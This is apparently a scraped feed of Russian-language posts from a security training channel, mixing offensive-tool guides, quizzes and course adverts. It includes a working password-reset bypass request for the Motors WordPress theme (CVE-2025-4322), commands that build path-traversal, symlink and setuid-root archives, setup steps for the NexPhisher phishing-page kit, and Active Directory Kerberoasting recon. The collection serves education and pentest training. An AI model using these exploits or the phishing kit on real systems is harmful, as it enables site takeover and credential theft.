😈 CVE-2025-4322: Как одна строка кода открыла двери тысяч сайтов хакерам

Представьте: ваш сайт внезапно перестаёт подчиняться вам. Вы не можете войти в админку, а вместо этого видите нового администратора с подозрительным именем. Через несколько часов сайт превращается в рассадник вредоносного кода или часть ботнета. Всё это — последствия критической уязвимости в популярной теме Motors, получившей идентификатор CVE-2025-4322.

▪️2 мая 2025 года команда безопасности Wordfence обнаружила опасную брешь в теме Motors, предназначенной для автомобильных сайтов.
Уязвимость позволяла злоумышленникам получать полный контроль над сайтом, просто сбросив пароль администратора
▪️Уже 19 мая информация стала публичной
▪️20 мая начались массовые атаки
▪️К 7 июня было зафиксировано более 23100 попыток взлома

Проблема кроется в виджете «Login Register», отвечающем за авторизацию и восстановление пароля. Хакеры нашли способ обойти проверку хэша, подменяя параметры запроса.

➡️Как работала атака?
- Поиск уязвимого пути (злоумышленники искали страницы вроде /login-register, /reset-password, /account)
- Подмена данных (отправлялся POST-запрос с искажённым параметром hash_check (содержащим некорректные UTF-8 символы)). Пример запроса:

POST /reset-password HTTP/1.1
     Host: example.com
     Content-Type: application/x-www-form-urlencoded

     user_id=1&new_pass=Hacked123!&hash_check=%EF%BF%BD%EF%BF%BD%EF%BF%BD      

- Обход защиты (система ошибочно считала запрос валидным и позволяла сбросить пароль)
- Захват админки (указывался ID=1 (первый пользователь, обычно администратор) и новый пароль (например, Testtest123!@# или `rzkkd$SP3znjrn`))

Результат: злоумышленник получал доступ к админ-панели, создавал новые учётные записи и мог делать с сайтом что угодно.

✨Как обнаружить взлом?
- Появились новые пользователи с правами администратора
- В логах есть подозрительные IP-адреса или попытки сброса пароля
- В базе данных встречаются пароли, которые выглядят примерно так: Kurd@Kurd12123 или owm9cpXHAZTk

⤵️ Похожие уязвимости
▪️CVE-2021-29447 (позволяла загружать вредоносные XML-файлы и читать системные файлы)
▪️CVE-2020-25286 (давала доступ к базе данных через подмену параметров)
▪️CVE-2018-6389 (использовалась для перегрузки сервера)

Читать полностью…

🙃 ffufai

Инструмент, являющийся оболочкой на основе ИИ для популярного фаззера ffuf для более эффективного обнаружения уязвимостей. Автоматически предлагает расширения файлов для фаззинга на основе целевого URL-адреса и его заголовков, используя модели OpenAI GPT или Anthropic Claude. Полностью совместим с ffuf и работает с такими же параметрами.

📕 Возможности
⏺️"Умный" фаззинг веб-приложений с помощью ИИ;
⏺️Генерация подсказок для дальнейшего тестирования;
⏺️Идентификация проблем безопасности, которые могут быть упущены традиционными инструментами.

🐍 Установка
Клонируем репозиторий, переходим в папку с проектом, устанавливаем необходимые зависимости:

git clone https://github.com/jthack/ffufai
cd ffufai
pip install requests openai anthropic

Далее делаем скрипт исполняемым и для удобства использования ffufai из любого места, создаем символическую ссылку в каталоге, который находится в вашей переменной PATH:

chmod +x ffufai.py
sudo ln -s /<your_path>/ffufai.py /usr/local/bin/ffufai

Финальным шагом необходимо настроить ключ API в качестве переменной окружения для OpenAI или Anthropic's Claude AI:

export OPENAI_API_KEY='your-api-key-here'
export ANTHROPIC_API_KEY='your-api-key-here'

✏️ Использование
Использование идентичное обычному ffuf. В случае если символическая ссылка отсутствует вызывать необходимо с помощью python3 ffufai.py, иначе ffufai:

python3 ffufai.py -u https://example.com/FUZZ -w /path/to/wordlist.txt
#or
ffufai -u https://example.com/FUZZ -w /path/to/wordlist.txt

ffufai требует, чтобы ключевое слово FUZZ находилось в конце пути URL-адреса для точного определения расширения. Если это не так, вы получите предупреждение.

Читать полностью…

💥 67% всех утечек данных — из-за SQL-инъекций.

Если вы пентестер (или хотите им стать), вы обязаны уметь находить SQL-уязвимости. Это прямой путь к базе данных, админке, а иногда — к полному контролю над системой.

Где этому научиться?
На практическом курсе по SQL-инъекциям от Академии Кодебай!
🟧Запись на поток до 3 июля, а сейчас действует скидка 10% по промокоду SQL10!

На курсе вы научитесь:
🟧 понимать структуру SQL и писать запросы с нуля
🟧 внедрять SQL-код в уязвимые формы, параметры, cookies
🟧 раскручивать SQLi вручную и через Burp/SQLmap
🟧 закрывать такие уязвимости на бэке

Аналогов по объёму практики в СНГ и EN-сегменте просто нет.

🟧 Регистрируйтесь, пока действует скидка

🚀 По всем вопросам пишите @Codeby_Academy

Читать полностью…

⚡️ Угадайте уязвимость по описанию:

Злоумышленник отправляет жертве ссылку, которая выглядит как легитимный запрос на изменение пароля. Когда жертва кликает по ссылке, ее браузер выполняет действие от ее имени без ее ведома.

👇 Выбирайте вариант ответа!

Читать полностью…

Как построить успешную карьеру в тестировании на проникновение? Всё начинается с прочного базиса — тех знаний, без которых даже самые мощные инструменты останутся бесполезными.

В статье рассмотрим:
⭐Как эффективно изучить Linux, сети и Python
⭐Где получить реальную практику
⭐Ошибки новичков и как их избежать

Среди обилия информации системный подход к обучению становится ключевым.

Отличной отправной точкой может стать курс "Профессия Пентестер", который поможет:
⭐Освоить практические навыки пентеста
⭐Подготовиться к экзамену OSCP
⭐Получить практические задания с экспертной проверкой

➡️ Читайте полный гайд

Читать полностью…

Киберпреступления оставляют цифровые следы. Научитесь их находить.

Цифровой криминалист — это тот, кто расследует атаки, восстанавливает данные и делает виртуальный мир безопаснее.

Освойте цифровую криминалистику и реагирование на инциденты в Linux-среде. Запись до 26 июня!

⌨️ Регистрация здесь

Что вас ждёт на курсе:
🟧 Реальные кейсы, основанные на APT-отчетах
🟧 Полный цикл реагирования на инциденты с помощью opensource-инструментов
🟧 Поиск и анализ артефактов хакеров и вредоносного ПО

Кому подходит курс:
🟧 Аналитикам 1, 2, 3 линии SOC
🟧 Начинающим специалистам в DFIR и Red Team
🟧 Организациям, желающим прокачать команду по реагированию на киберинциденты и Linux-форензику

Хотите научиться расследовать кибератаки и распутывать цифровые следы?
Присоединяйтесь — узнайте всё о форензике. Начать учиться сейчас

🚀 @Codeby_Academy

Читать полностью…

🔍 Киберрасследование: Кто украл данные?

Вы — SOC-аналитик. В сети компании обнаружена утечка конфиденциальных файлов. Вот что удалось собрать:

*️⃣В 09:15 сотрудник получил письмо с темой «Договор о защите информационных систем №-4513 на подпись» от якобы доверенного контрагента.

*️⃣В 09:20 он открыл вложение — файл contract_scanned.exe, маскирующийся под PDF.

*️⃣В 09:22 на его ПК (Windows 10) запустился процесс msbuild.exe с необычными аргументами:

/tmp:7a3f1 /payload:http://malware[.]xyz/get.dll

*️⃣ В 09:25 этот процесс подключился к IP 91.234.18.77 (порт 8443) и начал массово копировать файлы из сетевой папки \\NAS\Information\.

⬇️ Выбирайте ответ!

💬 Какие индикаторы компрометации (IOCs), помимо указанных в описании инцидента, можно выделить для дальнейшего поиска подобных атак в сети компании? Делитесь своими идеями!

Читать полностью…

🚩 Новые задания на платформе HackerLab!

👩‍💻 Категория Pentest Machines — Последний танец

🔎 Категория OSINT — Народный автомобиль

Приятного хакинга!

Читать полностью…

В новом видео — разбор лабораторной работы от Дениса Соколова: пентест WordPress от первоначального доступа до повышения привилегий.
Сканирование, эксплуатация, эскалация — всё пошагово, на основе реальных техник, которые используются в профессиональных тестах на проникновение.

📺 Смотреть на YouTube
™️ Смотреть в VK

Такие практикумы — это лишь часть полноценной программы. Реальные техники, настоящая цель, никакой воды.
🟧 Старт курса «Профессия Пентестер» — уже в понедельник! Начать обучение сейчас.

🚀 @Codeby_Academy

Читать полностью…

🤔 Как хорошо вы умеете определять тип атаки по ее сценарию? Что ж, самое время себя проверить!

Злоумышленник осуществляет инъекцию произвольного JavaScript-кода через уязвимое поле пользовательского ввода (комментарии). Вредоносный скрипт сохраняется на сервере и исполняется в контексте сессии аутентифицированных пользователей при отображении заражённой страницы.

В результате:
• Происходит несанкционированное выполнение операций от имени жертвы.
• Возможна компрометация сессионных cookie (при отсутствии HttpOnly).
• Реализуется цепочка атак для эскалации привилегий.

🟧 Выбирайте ответ!

🟧 Бонусный вопрос: Какие два основных метода защиты наиболее эффективны против этой уязвимости?

Читать полностью…

Airdump-ng

Airodump-ng — это утилита для захвата пакетов, которая используется в рамках набора инструментов aircrack-ng. Она позволяет собирать сырые фреймы 802.11, что делает её полезной для анализа беспроводных сетей и сбора данных о WEP и WPA шифровании.

💡Основные функции:
⏺️Захват трафика - Airodump-ng позволяет захватывать пакеты, проходящие через беспроводную сеть, что помогает в анализе трафика и выявлении уязвимостей.
⏺️Отображение информации о сетях - Утилита выводит информацию о доступных точках доступа, включая их BSSID, ESSID, уровень сигнала и используемый канал.
⏺️Сбор данных о клиентах - Airodump-ng также отображает информацию о подключенных клиентах, что позволяет отслеживать активность пользователей в сети.

📎Установка:
Инструмент уже предустановлен в Kali Linux, способ установки для других систем:

git clone https://github.com/aircrack-ng/aircrack-ng.git

📌Использование:
1️⃣ Запуск утилиты

sudo airodump-ng [INTERFACE]

Утилита автоматически перевела мой сетевой адаптер в режим монитора.

Читать полностью…

▶️ Уже СЕГОДНЯ пройдет бесплатный вебинар для DevOps-инженеров и разработчиков

🟧 СЕГОДНЯ в 19:00 (мск) БЕСПЛАТНО
🟧 Регистрация

Что разберём?
🟧 Что такое CI/CD и зачем он нужен
🟧 Как работает пайплайн от коммита до продакшена
🟧 Инструменты: Jenkins, GitLab CI/CD, GitHub Actions, ArgoCD
🟧 Практика: настройка автоматического деплоя

Спикер: Алексей Рагузин — DevOps-инженер с 15+ годами опыта (Сбербанк, Транснефть, Россети). Преподаватель ведущих IT-школ.

Регистрируйтесь сейчас и получите ссылку на эфир! 😎 Регистрация здесь.

🚀 Трудности с регистрацией? Пишите @Codeby_Academy

Читать полностью…

🎉 Результаты розыгрыша:

🏆 Победители:
1. NDA (@abracadaabra21)
2. Nikita (@niktorinf)
3. Musa (@borzmusa)
4. Константин
5. Menschenfresser (@Delifer313)
6. Stanislav (@r4v3x)
7. 𝙭𝙖𝙨𝙖𝙣𝙤𝙫.𝙭𝙘𝙨 (@rootVip3r)
8. Harry (@harrykiselev)
9. Жабовски (@Bigzhabovski)
10. _☣_ (@ridij)
11. The Polar Owl
12. NN (@ShoutkinN)
13. Artem (@llegi0ner)
14. L00king (@L00kem)
15. Денис (@tv00iPapa)
16. vasebur (@vasebur)
17. Константин (@kburdakov)
18. Михаил (@mikhail_2306)
19. ㅤPolya (@poly1araid)
20. Dmitry (@DmitryNT)
21. Владислав (@Watatamin)
22. Егор (@FireL1ght)
23. Pediak (@Tritium200)
24. ︎ ︎︎ ︎ ︎ ︎ ︎︎ ︎ ︎︎︎ ︎ ︎ ︎ ︎ ︎ ︎︎ ︎ ︎ ︎ ︎︎ ︎ ︎ ︎ ︎︎ ︎ ︎︎︎ ︎ ︎ ︎
25. Cosmic (@dkondr1)
26. Egor (@EgorMazur)
27. Георгий (@george_rodin)
28. Sergey (@Quasi_m0rda)
29. Alexey (@ZarutskiyA)
30. Vladimir (@admmv)
31. D (@im_n0t_a_r0b0t)
32. Roy (@IIi8sII)
33. Sergei (@SergeiTrishin)
34. Alexander (@alex0tarasov)
35. Владислав (@Passyonary)

✔️Проверить результаты

Читать полностью…

Hash-identifier

Программное обеспечение для определения различных типов хэшей, используемых для шифрования данных и особенно паролей.

💡Основные функции:
⏺️Идентификация хешей - утилита может распознавать множество различных типов хешей, включая MD5, SHA-1, SHA-256, SHA-512 и другие.
⏺️Поддержка различных форматов - Инструмент может обрабатывать хеши, представленные в различных форматах, включая текстовые строки и шестнадцатеричные значения.
⏺️Удобный интерфейс - Инструмент обычно имеет простой и интуитивно понятный интерфейс.

📎Установка:
Инструмент уже предустановлен в Kali Linux, способ установки для других систем:

git clone https://gitlab.com/kalilinux/packages/hash-identifier.git

📌Использование:
1️⃣ Запускаем командой

hash-identifier

2️⃣ Вставляем Хеш

Читать полностью…

🎩 StegCloak

Инструмент стеганографии на JavaScript, который скрывает секретные сообщения в обычном тексте путём сжатия и шифрования секрета перед маскировкой его специальными невидимыми Unicode-символами.

✨ Характеристики
🌟Криптографическая защита путём шифрования невидимого секрета с помощью AES-256-CTR;
🌟Максимальное сжатие для уменьшения полезной нагрузки;
🌟Доступен в виде модуля API, интерфейса командной строки, а также веб-интерфейса

🧑‍💻 Установка
Глобальная установка через npm:

npm install -g stegcloak

Локальная установка для проекта:

npm install stegcloak

👩‍💻 Использование
Скрываем секретное сообщение secret в "text text":

stegcloak hide secret "text text"

После ввода команды необходимо также ввести пароль. В результате в буфер обмена сохранится текст с секретным сообщением.

Для раскрытия информации необходимо вставить текст с невидимыми Unicode-символами (в консоли будет отображаться так) и ввести пароль:

stegcloak reveal "text <2061><200d><2061><200c><2061><2062><200c><200d><200d><200d><200d><2061><2062><200c><200d><2061><200c><2064><200c><200d><2061><200d><2062><2061><2061><2063><200c><2061><200d><2061><200c><2062><200c><200d><2061><2061><200d><2061><2064><2061><200d><2064><2063><2061><2062><200d><2062><200c><2061><2064><2062><200d>text"

Можно установить переменную окружения STEGCLOAK_PASSWORD, которая, если она задана, будет использоваться по умолчанию в качестве пароля.

📝 Дисклеймер
StegCloak эффективен только тогда, когда у злоумышленников нет цели найти информацию, переданную с его помощью. Его можно безопасно использовать для водяных знаков на форумах, невидимых твитов, социальных сетей и т. д.

Не рекомендуется использовать его, когда кто-то активно отслеживает ваши данные — просматривает Unicode-символы с помощью инструмента для анализа данных. В таком случае, даже если секретное сообщение не может быть расшифровано, посредник будет знать, что было какое-то секретное сообщение, потому что он заметит необычное количество специальных невидимых символов.

Читать полностью…

Каждый пентестер знает, когда стандартные инструменты бессильны, нужен свой код. В таких случаях умение программировать становится критически важным. И здесь Python — идеальный выбор для начала.

🟧Почему стоит выбрать Python? Прост в изучении, мощный, с богатыми библиотеками и работает везде.

О чём расскажем в статье?
🟡С чего начать изучение — подборка лучших ресурсов для старта
🟡Первый проект — какой скрипт написать в первую очередь
🟡Дальнейшее развитие — как прокачать навыки для реальных задач

🟧 Начать программировать проще, чем кажется. Главное — правильный подход. Как именно выстроить эффективное обучение и избежать типичных ошибок ➡️ читайте в статье.

Читать полностью…

🟧 Готовы к своему первому CTF? Пошаговый план для новичков!

Хотите попробовать свои силы в capture the flag, но не знаете, с чего начать? Это не «еще один гайд», а практический маршрут по всем ключевым этапам:

🟧 Что такое CTF - терминология, функционал и форматы задач
🟧 OSINT-разведка - как собирать важную информацию перед атакой
🟧 Стеганография - от спрятанных данных в картинках до HEX-редакторов
🟧 Реверс-инжиниринг, анализ трафика и работа с Wireshark для реального понимания системы …и многое другое по алгоритму: сбор → анализ → эксплуатация!

Это не только теория, а «генератор навыков» для реальных CTF — разобранных подробно и с понятными примерами. Возьмите свое: пошаговый план, инструменты и первые практические кейсы — идеально для старта и прокачки в ИБ.

🟧 Читать полностью: «Как подготовиться к своему первому CTF: пошаговый план для новичков»

Читать полностью…

🌐 Setezor — швейцарский нож для анализа и проектирования сетевой инфраструктуры. Данный инструмент будет полезен пентестерам, сетевикам, системным администраторам.

😮 Функционал
⏺️Работа с веб-интерфейсом;
⏺️Разделение на проекты;
⏺️Табличное представление данных с возможность применения фильтров, экспорт в формате электронной таблицы;
⏺️Генерация снимка экрана веб-ресурса;
⏺️Поиск программного обеспечения по узлам сети;
⏺️Активное и пассивное сканирование с использованием nmap, masscan и scapy;
⏺️Парсинг pcap-файлов, xml-логов сканирования nmap, xml/list/json-логов сканирования masscan;
⏺️Получение информации организовано в виде задач, при изменении статуса задачи всплывает уведомление;
⏺️Получение списка уязвимостей для конкретного ПО посредством интеграции с search-vulns;
⏺️Формирование отчёта по найденным уязвимостям;
⏺️Поиск сетевых узлов по протоколу SNMP и сбор установленного программного обеспечения;
⏺️Автоматическое построение карты сети на L3 уровне;
⏺️Поиск субдоменов через DNS;
⏺️Получение SSL сертификата;
⏺️Получение детальной информации о регистре домена;
⏺️HTTP REST API – унифицированный веб-интерфейс для взаимодействия с клиентской частью приложения и интеграциями с другими информационными системами.

✨ Установка и запуск
Скачать установочный DEB-пакет. При установке убедиться, что вы расположены в директории с DEB-пакетом, иначе прописать полный путь. Далее объявляем переменные окружения:

sudo apt install ./setezor_<версия>.deb
export SERVER_REST_URL=https://<ip/domain>:<port>
export SECRET_KEY=abcdef

Запускаем сервер командой setezor.
Запускаем агента командой setezor -s -p <port>

На странице Settings находятся все агенты проекта и сервер. Для создания нового агента нажать на Add agent.

Для выполнения необходимых задач выбираем нужные параметры и агента, который будет выполнять действие.

Читать полностью…

archivealchemist — инструмент для создания специально разработанных архивов для тестирования уязвимостей при извлечении данных.

❗️Характеристики
⏺️Создание ZIP- и TAR-архивов с вредоносными шаблонами;
⏺️Поддержка атак с обходом пути;
⏺️Поддержка символических и жестких ссылок;
⏺️Возможность устанавливать специальные биты разрешений (setuid, setgid, sticky bit);
⏺️Точный контроль над атрибутами файлов (режим, владелец, группа, время изменения);
⏺️Команды манипулирования: добавить, заменить, дополнить, изменить;
⏺️Вспомогательные команды: извлечение, список, чтение;
⏺️Создание файлов polyglot (дополните архив данными + настройте заголовки).

⬇️Установка
Клонируем репозиторий, переходим в папку с проектом, делаем скрипт исполняемым и опциональным шагом является создание симлинка, чтобы пользоваться инструментом без привязки к необходимой директории:

git clone https://github.com/avlidienbrunn/archivealchemist
cd archivealchemist
chmod +x archive-alchemist.py
sudo ln -s $(pwd)/archive-alchemist.py /usr/local/bin/archive-alchemist

⚡️ Использование
Архив с полезной нагрузкой для обхода путей:

archive-alchemist zipslip.zip add "../../../tmp/evil.txt" --content "I escaped the extraction directory!"

Архив с символической ссылкой, указывающей на конфиденциальный файл:

archive-alchemist symlink_attack.tar -t tar add .bashrc --symlink "/etc/passwd"

Создание исполняемого файла с правами суперпользователя:

archive-alchemist setuid_attack.tar -t tar add exploit --content "#!/bin/sh\nwhoami" --mode 0755 --setuid --uid 0

Создание файла, который является допустимым ZIP-файлом и начинается с магических байтов GIF

archive-alchemist polyglot.gif add payload.txt --content "hello there"

Поддерживает следующие команды
🌟add - добавление файлов, каталогов, символических или жестких ссылок в архив;
🌟replace - замена существующих файлов или каталогов в архиве;
🌟append - добавление дополнительного содержимого к существующим файлам в архиве;
🌟modify - изменение атрибутов файла или преобразование файлов в символические/жесткие ссылки;
🌟remove/rm - удаление файлов, каталогов, символических или жестких ссылок из архива;
🌟list/ls - отображение содержимого архива;
🌟extract - извлечение файлов из архива в файловую систему;
🌟read/cat - чтение файла из архива в стандартный вывод;
🌟polyglot - добавление содержимое в архив, сохраняя его валидным.

Читать полностью…

⚡️ Угадай уязвимость по коду:

В приложении есть следующий код:

SELECT * FROM users WHERE username = '" + userInput + "' AND password = '" + userPassword + "';

К какой уязвимости подвержен данный код?
1️⃣ SQL Injection
2️⃣ Command Injection
3️⃣ Code Injection
4️⃣ Bruteforce

Пиши свой ответ в комментарии👇

Читать полностью…

NexPhisher

NexPhisher — Это утилита для создания фишинговых страниц авторизации популярных соц.сетей, поисковиков, киноплощадок, игровых аккаунтов.

💡Основные функции:
⏺️Выбор нескольких сервисов - Утилита имеет большой выбор, до 30 сервисов.
⏺️Понятный интерфейс - Программа очень простая и справится каждый.
⏺️Большой выбор хоста - есть известные Ngrok, Serveo и новые LocalHostRun, LocalXpose.

📎Установка:

git clone https://github.com/htr-tech/nexphisher.git

cd nexphisher

./setup

📌Использование:
1️⃣Запуск утилиты

bash nexphisher

Читать полностью…

😶‍🌫️ Забыл всё, чему учился по ИБ? Это не провал — это сигнал к действию!

В нашей новой статье «Я ничего не помню: как не забыть выученное. Методы обучения для информационной безопасности» вы узнаете:

✔️ Почему стандартные подходы не работают — и как мозг теряет новую инфу
✔️ Эффективные техники запоминания: интервальное повторение, карточки, мнемоника
✔️ Как превратить знания в привычку: как организовать расписание, работать с микрозадачами, фиксировать успехи
✔️ Практические советы для профи ИБ: как учить OSINT‑инструменты, CTF‑задачи, анализ уязвимостей — без выгорания

Статья — без воды, с реальными техниками, ссылками и примерами для применения уже сегодня.

➡️ Читайте и закрепляйте свои знания навсегда!

Читать полностью…

Фрустрация в CTF: почему опускаются руки и как с этим бороться

🟧Каждый, кто участвовал в CTF, знает это чувство: задача кажется нерешаемой, время уходит, а флаг так и не поддается.

В новой статье разбираем:
🟧Почему возникает фрустрация в CTF (и почему это нормально)
🟡Практические способы выйти из ступора
🟡Как сохранить мотивацию, даже когда всё кажется безнадежным
🟡Где искать помощь и вдохновение

🟧Советы подойдут и новичкам, и опытным игрокам. Главное — понять: трудности не означают поражение.

🟧 Читайте в статью, применяйте рекомендации, и пусть ни один флаг не устоит!

Читать полностью…

💻 git-hound

Инструмент для сбора информации, использующий GitHub Code Search API. GitHound ищет открытые ключи API и другую конфиденциальную информацию на GitHub с помощью поиска кода на GitHub, сопоставления шаблонов и поиска в истории коммитов. В отличие от других инструментов он ищет по всему GitHub, а не только в определённых репозиториях, у пользователей или в организациях.

Доступны результаты поиска в режиме реального времени с помощью GitHound Explore или с помощью флага --dashboard.

🚀 Установка
Скачайте последнюю версию со страницы релизов.
Распаковываем архив:

unzip git-hound_linux_amd64.zip

Добавляем API-токен github в config.yml

В качестве альтернативы можно использовать переменные окружения, которые будут переопределять значения в config.yml:
GITHOUND_GITHUB_TOKEN: Устанавливает токен доступа к API GitHub.
GITHOUND_INSERT_KEY: Устанавливает ключ вставки GitHoundExplore для функции --dashboard.

GitHound использует базу данных регулярных выражений для ключей API, поддерживаемую авторами Gitleaks.

📖 Принцип работы и использование
GitHound находит ключи API с помощью комбинации точных регулярных выражений для распространённых сервисов, таких как Slack и AWS, и универсального регулярного выражения API с учётом контекста. Это позволяет находить длинные строки, похожие на ключи API, которые окружены ключевыми словами, такими как Authorization и «API-Token». GitHound предполагает, что это ложные срабатывания, а затем проверяет их легитимность с помощью энтропии Шеннона, проверки слов из словаря, расчёта уникальности и обнаружения кодировки.
Далее он выводит результаты с высокой степенью достоверности. Для файлов, в которых кодируются секреты, он декодирует строки в формате base64 и ищет в закодированных строках ключи API.

echo "\"uberinternal.com\"" | githound --dig-files --dig-commitst --threads 100

--dig-files - Просматривает файлы репозитория, чтобы найти больше секретов;
--dig-commits - Просматривает историю коммитов, чтобы найти больше секретов.

Читать полностью…

Курс по реагированию на киберинциденты — завтра последний день по старой цене! Следующий поток через 2 месяца!

РКИ — это не теория. Это практический курс, после которого вы будете:
🟧 собирать дампы с Windows/Linux,
🟧 анализировать логи и вредоносное ПО,
🟧 работать с SIEM и проводить Threat Hunting,
🟧 грамотно реагировать на атаки и искать следы проникновения.

🟧 До 19 июня 🟧 77 990 ₽ 57 990 ₽ 🟧 Сертификат

🟧🟧🟧🟧 Подписка на hackerlab.pro — 40+ заданий по форензике и реагированию!

Если хотите попасть на поток по старой цене — успейте до конца дня.
🟧 Начать обучение сегодня

🚀 @Codeby_Academy

Читать полностью…

▶️ Друзья, уже через час стартует бесплатный вебинар «Основы и инструменты CI/CD: Автоматизация разработки и развертывания»!

Ведущий: Алексей Рагузин — DevOps-инженер с 15+ годами опыта (Сбербанк, Транснефть, Россети). Преподаватель ведущих IT-школ.

Вы еще успеваете присоединиться! 😎
🔴 Регистрируйтесь здесь и получите ссылку на эфир в ответном письме.

🚀 Трудности с регистрацией? Пишите @Codeby_Academy

Читать полностью…

Prowler: инструмент для аудита безопасности облачных сред

Prowler — это open-source инструмент, предназначенный для автоматизированного аудита безопасности облачных сред (AWS, Azure и Google Cloud), и проверки соответствия облачных инфраструктур международным стандартам, включая CIS Benchmark, ISO 27001, GDPR, HIPAA и другие. С его помощью можно выявлять уязвимости, ошибки конфигурации и потенциальные векторы атак.

🔤 Ключевые возможности:
- Поддержка основных облачных провайдеров (AWS, Azure, GCP).
- Проверка на соответствие стандартам безопасности (CIS, NIST, SOC 2, PCI DSS и др.)
- Вывод результатов в CSV, JSON, HTML, интеграция с Slack, Security Hub, Jira.
- Работает через Docker, CLI или напрямую из кода.

🔤 Начало работы
🔤 Создаем виртуальное окружение в директории с достаточным местом

python3 -m venv /tmp/prowler-venv --clear
source /tmp/prowler-venv/bin/activate

🔤 Устанавливаем Prowler

pip install prowler-cloud

🔤 Проверяем

prowler -v

🔤 Настройка доступа к облаку
Для AWS:

export AWS_ACCESS_KEY_ID="XXX"  
export AWS_SECRET_ACCESS_KEY="XXX"  
export AWS_SESSION_TOKEN="XXX"  # если используется временный токен  

🔤 Запуск базовой проверки для AWS
Выборочные проверки

prowler -c check1,check2

Полный аудит по CIS Level 1

prowler -g cis_level1 

🔤 Генерация отчета
JSON-отчет

prowler -M json -F report.json

HTML-отчет

prowler -M html -F report.html

🔤 Используйте для ежедневного мониторинга

prowler aws -b -q -M html > report-$(date +%F).html

🔤 Преимущества
- Автоматизированная проверка сотен контрольных точек безопасности.
- Соответствие регуляторным требованиям.
- Интеграция в CI/CD (может быть встроен в процессы DevOps для раннего обнаружения уязвимостей).

Читать полностью…

🚴‍♂️Не надо изобретать велосипед

Главная ошибка стартаперов — пытаться сделать идеальный продукт, годами его дорабатывать, но так и не выпустить.

В своём канале я запустил челлендж: 12 проектов за 12 месяцев.

1️⃣ Ищем идею под существующий спрос (не из головы!)
2️⃣ Разрабатываем продукт
3️⃣ Занимаемся бесплатным продвижением
4️⃣ Оптимизируем и масштабируем

Формула проста:
1 запуск = 1 функция = решение 1 проблемы

Три главных правила:
✔️ Только проверенный спрос — через поисковые запросы, а не догадки.
✔️ Быстрый запуск — никакого перфекционизма.
✔️ Только США и ЕС — там платят за удобство.

Также в канале разбираю:
— Кто и зачем будет платить за микро-продукт?
— Главная ошибка начинающих стартаперов
— Микро-продукт vs стартап
— Как бесплатно продвигать продукт

Короче, рассказываю в канале без купюр: что работает, а что нет, сколько приносит и как продвигаем. Всё, что обычно скрывают.

Читать полностью…

▶️ Автоматизируйте разработку с CI/CD! Бесплатный вебинар для DevOps-инженеров и разработчиков

Хотите научиться быстро и безопасно доставлять код в production? Тогда наш вебинар «Основы и инструменты CI/CD» — для вас!

🟧 18 июня в 19:00 (мск) БЕСПЛАТНО
🟧 Регистрация

Что разберём?
🟧 Что такое CI/CD и зачем он нужен
🟧 Как работает пайплайн от коммита до продакшена
🟧 Инструменты: Jenkins, GitLab CI/CD, GitHub Actions, ArgoCD
🟧 Практика: настройка автоматического деплоя

Для кого?
🟧 Начинающие DevOps-инженеры
🟧 Разработчики, которые хотят глубже понять процессы доставки кода
🟧 Все, кто хочет автоматизировать рутинные задачи

Спикер: Алексей Рагузин — DevOps-инженер с 15+ годами опыта (Сбербанк, Транснефть, Россети). Преподаватель ведущих IT-школ.

Не пропустите! 😎 Регистрация здесь.

🚀 Трудности с регистрацией? Пишите @Codeby_Academy

Читать полностью…

Ldeep: инструмент для тестирования Active Directory

🔤 Active Directory (AD) — это сердце корпоративной инфраструктуры, и именно поэтому она так привлекательна для злоумышленников. Есть одно «НО»: ручной разбор AD — это долго, сложно и неэффективно.

Ldeep — это инструмент, который автоматизирует сбор критически важной информации из LDAP, помогая находить уязвимости быстрее и точнее.

🔤 Зачем использовать Ldeep
🔤 Автоматизация разведки в AD
Вместо ручных LDAP-запросов или запуска BloodHound (который требует Neo4j и времени на анализ графа), Ldeep позволяет получать данные одной командой.

🔤 Поиск всех пользователей с непросроченными паролями, но без MFA:

ldeep ldap -s dc01.corp.local -d corp.local -u pentester -p 'Passw0rd!' search "(&(objectCategory=user)(!(userAccountControl:1.2.840.113556.1.4.803:=2)))"

🔤 Поиск векторов атаки, которые умеет находить Ldeep:
- Kerberoast-able аккаунты (сервисные учётки с SPN)
- AS-REP Roasting (учётки с отключённым Kerberos pre-authentication)
- Unconstrained Delegation (опасные настройки делегирования)
- Shadow Admins (пользователи с критическими правами вне групп Admins)

🔤 Поиск всех сервисных аккаунтов для Kerberoasting:

ldeep ldap -s dc01.corp.local -d corp.local -u auditor -p 'Secure123!' search "(&(objectCategory=user)(servicePrincipalName=*))"

🔤 Анализ ACL и опасных разрешений
Одна из самых частых проблем в AD — неправильно настроенные права доступа. Ldeep помогает быстро находить:
- Пользователей, которые могут изменять Group Policy
- Учётные записи с правами на сброс паролей
- Членство в привилегированных группах

🔤 Поиск пользователей, которые могут изменять GPO:

ldeep ldap -s dc01.corp.local -d corp.local -u hacker -p 'P@ssw0rd!' search "(objectClass=groupPolicyContainer)" | grep distinguishedName | head -1 | xargs -I{} ldeep ldap -s dc01.corp.local -d corp.local -u hacker -p 'P@ssw0rd!' sddl "{}"

Разбор команд:
-s dc01.corp.local - указание LDAP-сервера (обычно контроллера домена)
-d corp.local - доменное имя
-u pentester - имя пользователя
-p 'Passw0rd!' - пароль
search - действие (поиск)
Фильтр LDAP для поиска активных пользователей

❗️ Установка Ldeep
🔤 Клонирование репозитория

git clone https://github.com/franc-pentest/ldeep.git
cd ldeep

🔤 Установка зависимостей

pip3 install -r requirements.txt

🔤 Проверка работоспособности

ldeep -h

Используйте Ldeep в связке с BloodHound (для визуализации) и Impacket (для эксплуатации).

Читать полностью…